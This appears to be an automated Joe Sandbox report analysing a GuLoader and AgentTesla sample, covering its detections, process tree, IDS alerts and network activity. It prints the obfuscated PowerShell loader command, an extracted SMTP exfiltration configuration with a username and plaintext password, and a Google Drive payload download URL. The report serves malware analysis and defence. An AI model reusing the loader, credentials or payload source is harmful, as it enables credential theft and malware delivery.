Edit tour

Windows Analysis Report
REnBTVfW8q.exe

Overview

General Information

Sample name:	REnBTVfW8q.exe renamed because original name is a hash value
Original sample name:	5201c8e6b6fc7dab0c7877710df4ca1943b1f6c6d99e93bc0c21d79fa6ea9943.exe
Analysis ID:	1549457
MD5:	e6a0bb6bcaf44fbcc341ef4c93482059
SHA1:	c624142c98aef78d3a0434cf308f42750315b4bb
SHA256:	5201c8e6b6fc7dab0c7877710df4ca1943b1f6c6d99e93bc0c21d79fa6ea9943
Tags:	exeuser-adrian__luca
Infos:

Detection

AgentTesla, GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Early bird code injection technique detected

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AgentTesla

Yara detected GuLoader

AI detected suspicious sample

Check if machine is in data center or colocation facility

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Found suspicious powershell code related to unpacking or dynamic code loading

Loading BitLocker PowerShell Module

Machine Learning detection for sample

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Queues an APC in another process (thread injection)

Sigma detected: Suspicious Script Execution From Temp Folder

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sigma detected: Msiexec Initiated Connection

Sigma detected: Suspicious Outbound SMTP Connections

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

REnBTVfW8q.exe (PID: 752 cmdline: "C:\Users\user\Desktop\REnBTVfW8q.exe" MD5: E6A0BB6BCAF44FBCC341EF4C93482059)

powershell.exe (PID: 1568 cmdline: "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspondyly\immingles\Heterognath.Hjs' ; $Devilkin=$Cephalochorda.SubString(22951,3);.$Devilkin($Cephalochorda) " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 3636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

msiexec.exe (PID: 7048 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://0xmrmagnezi.github.io/malware%20analysis/AgentTesla/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "smtp.santonswitchgears.com", "Username": "tech1@santonswitchgears.com", "Password": "   cJPF@$I3   "}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\Polyspondyly\immingles\Dusinenes.Hav	JoeSecurity_GuLoader_5	Yara detected GuLoader	Joe Security
C:\Users\user\AppData\Local\Temp\nsc2139.tmp	JoeSecurity_GuLoader_5	Yara detected GuLoader	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000005.00000002.2677888739.0000000025194000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000002.2677888739.0000000025194000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000005.00000002.2677888739.00000000251BD000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000002.00000002.1647862127.00000000094F0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_5	Yara detected GuLoader	Joe Security
00000000.00000002.1438403773.0000000002999000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_GuLoader_5	Yara detected GuLoader	Joe Security
00000005.00000002.2677888739.00000000251C5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000002.00000002.1647881409.000000000C7EF000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000002.00000002.1641405594.0000000006319000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_GuLoader_5	Yara detected GuLoader	Joe Security
Process Memory Space: msiexec.exe PID: 7048	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: msiexec.exe PID: 7048	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Click to see the 5 entries

Sigma Signatures

System Summary

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspondyly\immingles\Heterognath.Hjs' ; $Devilkin=$Cephalochorda.SubString(22951,3);.$Devilkin($Cephalochorda) ", CommandLine: "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspondyly\immingles\Heterognath.Hjs' ; $Devilkin=$Cephalochorda.SubString(22951,3);.$Devilkin($Cephalochorda) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\REnBTVfW8q.exe", ParentImage: C:\Users\user\Desktop\REnBTVfW8q.exe, ParentProcessId: 752, ParentProcessName: REnBTVfW8q.exe, ProcessCommandLine: "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspondyly\immingles\Heterognath.Hjs' ; $Devilkin=$Cephalochorda.SubString(22951,3);.$Devilkin($Cephalochorda) ", ProcessId: 1568, ProcessName: powershell.exe

Sigma detected: Msiexec Initiated Connection

Source: Network Connection

Author: frack113: Data: DestinationIp: 142.250.185.238, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 7048, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49710

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 208.91.199.223, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 7048, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49714

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspondyly\immingles\Heterognath.Hjs' ; $Devilkin=$Cephalochorda.SubString(22951,3);.$Devilkin($Cephalochorda) ", CommandLine: "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspondyly\immingles\Heterognath.Hjs' ; $Devilkin=$Cephalochorda.SubString(22951,3);.$Devilkin($Cephalochorda) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\REnBTVfW8q.exe", ParentImage: C:\Users\user\Desktop\REnBTVfW8q.exe, ParentProcessId: 752, ParentProcessName: REnBTVfW8q.exe, ProcessCommandLine: "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspondyly\immingles\Heterognath.Hjs' ; $Devilkin=$Cephalochorda.SubString(22951,3);.$Devilkin($Cephalochorda) ", ProcessId: 1568, ProcessName: powershell.exe

Suricata Signatures

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-05T16:36:34.240688+0100	2022930	1	A Network Trojan was detected	20.109.210.53	443	192.168.2.8	49705	TCP
2024-11-05T16:37:12.483432+0100	2022930	1	A Network Trojan was detected	20.109.210.53	443	192.168.2.8	49715	TCP

ET MALWARE AgentTesla Exfil Via SMTP

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-05T16:36:10.560898+0100	2030171	1	A Network Trojan was detected	192.168.2.8	49714	208.91.199.223	587	TCP

ETPRO MALWARE Agent Tesla CnC Exfil Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-05T16:37:01.980691+0100	2855542	1	A Network Trojan was detected	192.168.2.8	49714	208.91.199.223	587	TCP

ETPRO MALWARE Agent Tesla Exfil via SMTP

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-05T16:37:01.980691+0100	2855245	1	A Network Trojan was detected	192.168.2.8	49714	208.91.199.223	587	TCP

ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-05T16:36:10.560898+0100	2840032	1	A Network Trojan was detected	192.168.2.8	49714	208.91.199.223	587	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: REnBTVfW8q.exe

Avira: detected

Found malware configuration

Source: msiexec.exe.7048.5.memstrmin

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "smtp.santonswitchgears.com", "Username": "tech1@santonswitchgears.com", "Password": " cJPF@$I3 "}

Multi AV Scanner detection for submitted file

Source: REnBTVfW8q.exe

ReversingLabs: Detection: 42%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.8% probability

Machine Learning detection for sample

Source: REnBTVfW8q.exe

Joe Sandbox ML: detected

Source: REnBTVfW8q.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 142.250.185.238:443 -> 192.168.2.8:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.65:443 -> 192.168.2.8:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.8:49712 version: TLS 1.2

Source: REnBTVfW8q.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.1646767837.0000000008B23000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: tem.Core.pdb source: powershell.exe, 00000002.00000002.1646767837.0000000008B23000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\REnBTVfW8q.exe	Code function: 0_2_00402862 FindFirstFileW,	0_2_00402862
Source: C:\Users\user\Desktop\REnBTVfW8q.exe	Code function: 0_2_004066F3 FindFirstFileW,FindClose,	0_2_004066F3
Source: C:\Users\user\Desktop\REnBTVfW8q.exe	Code function: 0_2_00405ABE CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405ABE

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855245 - Severity 1 - ETPRO MALWARE Agent Tesla Exfil via SMTP : 192.168.2.8:49714 -> 208.91.199.223:587
Source: Network traffic	Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.8:49714 -> 208.91.199.223:587
Source: Network traffic	Suricata IDS: 2030171 - Severity 1 - ET MALWARE AgentTesla Exfil Via SMTP : 192.168.2.8:49714 -> 208.91.199.223:587
Source: Network traffic	Suricata IDS: 2840032 - Severity 1 - ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 : 192.168.2.8:49714 -> 208.91.199.223:587

Source: global traffic

TCP traffic: 192.168.2.8:49714 -> 208.91.199.223:587

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 208.95.112.1 208.95.112.1
Source: Joe Sandbox View	IP Address: 208.91.199.223 208.91.199.223

Source: Joe Sandbox View

ASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: ip-api.com

Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.8:49715
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.8:49705

Source: global traffic

TCP traffic: 192.168.2.8:49714 -> 208.91.199.223:587

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1cPTY4gwGJX8CNpYT9E3V1C8xeZUU6szo HTTP/1.1User-Agent: 5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1cPTY4gwGJX8CNpYT9E3V1C8xeZUU6szo&export=download HTTP/1.1User-Agent: 5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: ip-api.com
Source: global traffic	DNS traffic detected: DNS query: smtp.santonswitchgears.com

Source: powershell.exe, 00000002.00000002.1646767837.0000000008B23000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.m;
Source: msiexec.exe, 00000005.00000002.2677888739.0000000025181000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com
Source: msiexec.exe, 00000005.00000002.2677888739.0000000025181000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: REnBTVfW8q.exe, 00000000.00000000.1406879585.000000000040A000.00000008.00000001.01000000.00000003.sdmp, REnBTVfW8q.exe, 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000002.00000002.1641405594.00000000061D4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.1638881119.00000000052C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.1638881119.0000000005171000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2677888739.0000000025131000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: msiexec.exe, 00000005.00000002.2677888739.00000000251BD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://smtp.santonswitchgears.com
Source: msiexec.exe, 00000005.00000002.2677888739.00000000251BD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://us2.smtp.mailhostbox.com
Source: powershell.exe, 00000002.00000002.1638881119.00000000052C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: REnBTVfW8q.exe, 00000000.00000000.1406900001.000000000044D000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://www.skinstudio.netG
Source: powershell.exe, 00000002.00000002.1638881119.0000000005171000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: msiexec.exe, 00000005.00000002.2677888739.0000000025131000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org
Source: msiexec.exe, 00000005.00000002.2677888739.0000000025131000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/
Source: msiexec.exe, 00000005.00000002.2677888739.0000000025131000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/t
Source: msiexec.exe, 00000005.00000003.1764587505.0000000009960000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1764500258.0000000009960000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000002.00000002.1641405594.00000000061D4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.1641405594.00000000061D4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.1641405594.00000000061D4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: msiexec.exe, 00000005.00000002.2665422405.00000000098EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: msiexec.exe, 00000005.00000002.2665325367.0000000009850000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2665422405.00000000098EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1cPTY4gwGJX8CNpYT9E3V1C8xeZUU6szo
Source: msiexec.exe, 00000005.00000002.2665422405.00000000098EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1cPTY4gwGJX8CNpYT9E3V1C8xeZUU6szoxO
Source: msiexec.exe, 00000005.00000002.2665422405.0000000009947000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: msiexec.exe, 00000005.00000003.1764587505.0000000009960000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2665422405.0000000009947000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1764500258.0000000009960000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1cPTY4gwGJX8CNpYT9E3V1C8xeZUU6szo&export=download
Source: powershell.exe, 00000002.00000002.1638881119.00000000052C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.1641405594.00000000061D4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: msiexec.exe, 00000005.00000003.1764587505.0000000009960000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1764500258.0000000009960000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: msiexec.exe, 00000005.00000003.1764587505.0000000009960000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1764500258.0000000009960000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: msiexec.exe, 00000005.00000003.1764587505.0000000009960000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1764500258.0000000009960000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: msiexec.exe, 00000005.00000003.1764587505.0000000009960000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1764500258.0000000009960000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: msiexec.exe, 00000005.00000003.1764587505.0000000009960000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1764500258.0000000009960000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712

Source: unknown	HTTPS traffic detected: 142.250.185.238:443 -> 192.168.2.8:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.65:443 -> 192.168.2.8:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.8:49712 version: TLS 1.2

Source: C:\Users\user\Desktop\REnBTVfW8q.exe

Code function: 0_2_00405553 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_00405553

Source: C:\Users\user\Desktop\REnBTVfW8q.exe

Code function: 0_2_00403489 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,CoUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_00403489

Source: C:\Users\user\Desktop\REnBTVfW8q.exe	Code function: 0_2_00404D90	0_2_00404D90
Source: C:\Users\user\Desktop\REnBTVfW8q.exe	Code function: 0_2_00406ABA	0_2_00406ABA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_0501DFE0	2_2_0501DFE0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_00C7E758	5_2_00C7E758
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_00C74AC0	5_2_00C74AC0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_00C741F0	5_2_00C741F0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_00C73EA8	5_2_00C73EA8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_2805E818	5_2_2805E818
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_280566A0	5_2_280566A0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_280587D8	5_2_280587D8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_28050040	5_2_28050040
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_2805AC98	5_2_2805AC98
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_280559D0	5_2_280559D0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_28058EDF	5_2_28058EDF
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_2805B378	5_2_2805B378
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_280533C8	5_2_280533C8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_28050011	5_2_28050011

Source: REnBTVfW8q.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@6/13@5/5

Source: C:\Users\user\Desktop\REnBTVfW8q.exe

0_2_00403489

Source: C:\Users\user\Desktop\REnBTVfW8q.exe

Code function: 0_2_00404814 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_00404814

Source: C:\Users\user\Desktop\REnBTVfW8q.exe

Code function: 0_2_004020FE CoCreateInstance,

0_2_004020FE

Source: C:\Users\user\Desktop\REnBTVfW8q.exe

File created: C:\Program Files (x86)\Common Files\Jervin197.ini

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3636:120:WilError_03

Source: C:\Users\user\Desktop\REnBTVfW8q.exe

File created: C:\Users\user\AppData\Local\Temp\nsc2138.tmp

Jump to behavior

Source: REnBTVfW8q.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Windows\SysWOW64\msiexec.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
